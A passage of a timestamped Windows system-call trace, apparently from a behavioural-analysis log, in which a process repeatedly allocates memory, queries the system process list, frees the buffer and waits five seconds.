returned 0x0 [0258.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.195] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.195] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.196] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.202] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.203] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.204] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.211] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.213] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.215] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.248] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.250] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.250] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.251] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.251] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.251] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.256] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.258] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.258] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.259] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.265] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.273] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.279] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.279] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.281] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.281] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.285] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.286] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.287] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.288] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.288] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.288] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.292] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.293] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.294] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.298] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.299] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.302] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.302] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.302] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.306] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.315] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.316] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.319] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.320] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.322] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.322] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.326] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.327] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.329] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.329] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.329] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.330] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.334] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.334] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.336] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.336] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.337] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.337] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.343] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.345] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.345] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.346] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.346] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.349] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.358] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.359] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.360] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.360] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.361] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.361] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.365] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.366] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.368] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.368] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.369] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.369] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.374] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.375] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.376] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.377] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.377] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0258.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0258.382] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0258.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0258.391] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0258.391] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0258.392] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0258.393] NtQuerySystemInformation (in: 